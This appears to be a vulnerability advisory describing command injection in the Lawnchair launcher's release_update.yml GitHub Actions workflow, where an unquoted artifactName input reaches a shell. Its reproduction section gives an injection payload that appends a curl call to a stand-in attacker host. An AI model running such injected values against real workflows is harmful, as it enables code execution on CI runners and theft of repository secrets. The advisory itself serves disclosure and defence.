Lawnchair Command Injection Vulnerability in GitHub Actions Workflow Allowing Arbitrary Code Execution
Vulnerability
A command injection vulnerability has been identified in the Lawnchair Android launcher, specifically within the release_update.yml GitHub Actions workflow. This issue, present in versions prior to a recent patch, allows for arbitrary code execution by exploiting unquoted user input in the workflow dispatch. The vulnerability arises because the workflow directly incorporates input from the artifactName parameter into a shell command without proper sanitization, creating an opportunity for command injection.
Impact
Exploitation of this vulnerability could lead to arbitrary code execution on the GitHub Actions runner, with access to repository secrets and credentials. This could allow for exfiltration of sensitive data and potential supply chain attacks.
Reproduction
To reproduce this vulnerability, navigate to the Actions tab of the Lawnchair repository and select the Release Update workflow. Click 'Run workflow' and enter a crafted artifact name that includes command injection payloads, such as 'dummy; curl http://attacker.com; #'. Once the workflow is executed, the injected command will run in the context of the Actions runner, demonstrating the exploitation of the vulnerability.
Remediation
Users are advised to update to the latest version of Lawnchair, where this vulnerability has been patched.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.